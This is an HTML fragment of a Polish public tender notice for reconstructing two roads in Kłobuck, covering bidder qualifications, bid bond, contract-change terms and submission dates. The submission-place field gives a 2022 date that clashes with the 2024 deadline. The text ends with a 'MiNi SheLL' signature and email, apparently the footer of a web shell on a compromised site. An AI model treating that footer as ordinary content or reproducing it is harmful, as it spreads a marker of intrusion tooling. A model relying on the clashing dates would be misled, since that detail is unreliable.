Biuletynie Zamówień Publicznych.<br/>4. Zdolność techniczna lub zawodowa:<br/>a) w zakresie spełnienia warunku posiadania kwalifikacji zawodowych Zamawiający będzie uznawał, wykazanie przez<br/>Wykonawcę, że skieruje do realizacji zamówienia publicznego jedną osobę pełniącą funkcję kierownika budowy,<br/>posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej co najmniej w<br/>ograniczonym zakresie określone ustawą Prawo Budowlane (Dz. U. z 2021 r., poz. 2351 t.j. z dnia 2021.12.20) lub<br/>odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do<br/>kierowania w zakresie wymaganym do kierowania robotami będącymi przedmiotem niniejszego zamówienia lub ustawy z<br/>dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117<br/>t.j.) oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz.U. z 2021r. poz. 1646 t.j. z dnia 2021.09.08).<br/>b) w zakresie spełnienia warunku posiadania doświadczenia zawodowego Zamawiający będzie uznawał, wykazanie przez<br/>Wykonawcę w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>gospodarczej jest krótszy – w tym okresie – wykonania zgodnie z przepisami prawa budowlanego i prawidłowego<br/>ukończenia jednej roboty budowlanej polegającej na budowie lub przebudowie lub remoncie drogi o nawierzchni z<br/>mieszanek mineralno – asfaltowych o powierzchni nie mniejszej niż 1000 m2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunku udziału w postępowaniu dotyczącego<br/>sytuacji finansowej i ekonomicznej, na podstawie art. 274 ust. 1 ustawy, zostanie wezwany do złożenia podmiotowego środka<br/>dowodowego (aktualnego na dzień ich złożenia) w postaci polisy ubezpieczeniowej odpowiedzialności cywilnej, w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie niższej niż 500.000,00 zł .<br/>2. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunku udziału w postępowaniu<br/>dotyczącego posiadania kwalifikacji zawodowych, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia podmiotowego<br/>środka dowodowego (aktualnego na dzień ich złożenia) w postaci wykazu osób (zał. nr 9 do SWZ) skierowanych przez Wykonawcę<br/>do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności i informacji o podstawie do<br/>dysponowania tymi osobami.<br/>3. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunku udziału w postępowaniu<br/>dotyczącego posiadania doświadczenia zawodowego, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia<br/>podmiotowego środka dowodowego (aktualnego na dzień ich złożenia) w postaci wykazu robót budowlanych (zał. nr 8 do SWZ),<br/>wykonanych przez Wykonawcę w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności gospodarczej jest krótszy – w tym okresie – wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, ze te roboty zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych w rozumieniu art. 99 ust. 5 lub art. 101 ust. 4 ustawy, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferta/rozwiązania równoważne spełniają wymagania Zamawiającego opisane w przedmiocie zamówienia. Jeżeli Wykonawca nie złoży ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia), Zamawiający będzie wzywał do ich złożenia/uzupełnienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych w rozumieniu art. 99 ust. 5 lub art. 101 ust. 4 ustawy, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferta/rozwiązania równoważne spełniają wymagania Zamawiającego opisane w przedmiocie zamówienia. Jeżeli Wykonawca nie złoży ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia), Zamawiający będzie wzywał do ich złożenia/uzupełnienia. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć:<br/>1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania oraz spełnianiu<br/>warunków udziału w postępowaniu, w zakresie wskazanym w rozdziale XIX SWZ – zgodnie z załącznikiem nr 2 do SWZ.<br/>Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu<br/>na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>Oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. W przypadku powoływania się na zasoby podmiotu trzeciego Wykonawca, w przypadku polegania na<br/>zdolnościach technicznych lub podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o którym wyżej<br/>mowa, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu<br/>oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego<br/>zasoby (załącznik nr 2a do SWZ).<br/>2. Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z projektowanymi postanowieniami umowy w<br/>sprawie zamówienia, które zostaną wprowadzone do umowy w sprawie zamówienia oraz, że przyjmuje ich treść bez<br/>żadnych zastrzeżeń – zgodnie z treścią zawartą w formularzu oferty, stanowiącym załącznik nr 1 do SWZ.<br/>3. Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze<br/>złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym zgodnie z wytycznymi pkt 3.3 ust 3 Rozdz. XVI SWZ.<br/>4. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia<br/>publicznego.<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z<br/>pełnomocnictwem w postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub<br/>notariusz<br/>5. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do dyspozycji Wykonawcy niezbędnych<br/>zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności<br/>innych podmiotów na zasadach określonych w art. 118 ustawy).<br/>Zobowiązanie lub inny podmiotowy środek dowodowy w opisywanym zakresie, przekazuje się w postaci elektronicznej, i<br/>opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku, gdy<br/>zobowiązanie (inny podmiotowy środek dowodowy) zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępując do postępowania jest zobowiązany wnieść wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych) przed upływem terminu składania ofert.<br/>2. Wadium może być wnoszone w formach określonych w art. 97 ust. 7 pkt 1-4 ustawy.<br/>3.	Jeżeli wadium jest wnoszone w pieniądzu, należy je wpłacić przelewem na wskazany rachunek bankowy Zamawiającego:<br/>Bank Spółdzielczy w Kłobucku<br/>nr konta 55 8248 0002 1000 0000 0361 0004<br/>z dopiskiem:<br/> „Wadium IR.271.007.2024. SD Przebudowa drogi ul. Ściegiennego i drogi ul. Polnej w Kłobucku”.<br/><br/>4.	Wniesienie wadium w pieniądzu będzie skuteczne, gdy wpływ środków na rachunek zamawiającego nastąpi przed upływem terminu składania ofert. Oznacza to, że jeżeli z wyciągu z rachunku bankowego Zamawiającego wynika, iż kwota wadium została zaksięgowana po terminie składania ofert, zamawiający ma podstawy do odrzucenia oferty na podstawie art. 226 ust 1 pkt. 14 ustawy.<br/>5.	Jeżeli wadium jest wnoszone w formie innej niż pieniądz, to powinno być ono dołączone w formie oryginału do oferty. <br/>6.	Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z ustawy, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze żądanie zamawiającego, w przypadkach określonych w ustawie oraz być ważne przez okres związania ofertą, określony w niniejszej specyfikacji.<br/>7.	Zwrot wadium - zgodnie z art. 98 ust. 2 - 5 ustawy.<br/>8.	Zatrzymanie wadium - zgodnie z art. 98 ust. 6 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani są złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – zgodnie z ust. 3.3. rozdz. XVI SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art.<br/>125 ustawy (ust. 3.1. rozdziału XVI SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw<br/>wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia;<br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w<br/>postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie<br/>podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej<br/>umowy, zostały zebrane w formie wzoru umowy stanowiącego załącznik nr 4 do SWZ.<br/>1.1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455<br/>ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 4 do SWZ.<br/>1.2. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 3-4 oraz ust. 2 ustawy.<br/>2. Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale XXVIII SWZ.<br/>3. Strony mogą przedłużyć termin wykonania przedmiotu umowy, wskazany w § 4 ust. 1 umowy o okres trwania przyczyn, z<br/>powodu których brak jest możliwości prawidłowego prowadzenia prac, w następujących sytuacjach:<br/>1) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu wykonania przedmiotu umowy będą<br/>następstwem okoliczności leżących po stronie Zamawiającego, w szczególności będą następstwem nieterminowego<br/>przekazania terenu budowy, konieczności zmian dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub<br/>będą mogły mieć wpływ na dotrzymanie terminu wykonania przedmiotu umowy,<br/>2) gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z<br/>uwagi na technologię realizacji prac określoną: umową, normami lub innymi przepisami, wymagającej konkretnych<br/>warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność,<br/>3) gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu umowy<br/>zgodnie z zasadami wiedzy technicznej, które wstrzymują lub opóźniają realizację przedmiotu umowy, wystąpienia<br/>niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie<br/>niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>4) wystąpią opóźnienia w dokonaniu określonych czynności lub dojdzie do zaniechania określonych czynności przez<br/>właściwe organy administracji państwowej, o ile nie będzie to następstwem okoliczności, za które Wykonawca ponosi<br/>odpowiedzialność,<br/>5) wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są<br/>zobowiązane na mocy przepisów prawa, jeżeli opóźnienie to spowoduje przekroczenie, przewidzianego w przepisach prawa<br/>terminu, w którym ww. decyzje powinny zostać wydane oraz nie jest następstwem okoliczności, za które Wykonawca ponosi<br/>odpowiedzialność,<br/>6) wystąpi brak możliwości wykonywania robót z powodu niedopuszczania do ich wykonywania przez uprawniony organ lub<br/>nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,<br/>7) w razie wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami,<br/>8) w razie konieczności gdy wystąpią okoliczności, o których mowa w art. 455 ustawy Prawo zamówień publicznych.<br/>4. Wykonawca jest uprawniony do żądania zmiany umowy w zakresie materiałów, parametrów technicznych, technologii<br/>wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu umowy w sytuacjach wymienionych w § 20 ust 2<br/>załącznika nr 4 do SWZ.<br/>5. Na wniosek Wykonawcy i po spełnieniu warunków określonych we wzorze umowy dotyczących podwykonawstwa,<br/>Wykonawca może modyfikować w trakcie wykonywania zamówienia złożone w ofercie deklaracje odnośnie<br/>podwykonawstwa poprzez:<br/>1) wskazanie innych podwykonawców,<br/>2) rezygnację z wszystkich lub niektórych podwykonawców.<br/>6. Dopuszcza się możliwość podwyższenia lub obniżenia wynagrodzenia w sytuacji mającej wpływ na koszty wykonania<br/>przedmiotu umowy, w przypadkach wyszczególnionych w § 20 ust. 11 zał. nr 4 do SWZ.<br/>7. Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia został opisany w § 20 wzoru umowy stanowiącym zał. nr<br/>4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem miniPortalu (wybierając tam platformę usług administracji publicznej ePUAP Urząd Miejski w Kłobucku /umklobuck/skrytka), nie później niż do dnia 23.11.2022 r. do godziny 10:00. Uwaga: Za datę i godzinę złożenia oferty rozumie się datę i godzinę jej wpływu na miniPortal, tj. datę i godzinę złożenia oferty wyświetloną na koncie Zamawiającego.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-05 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com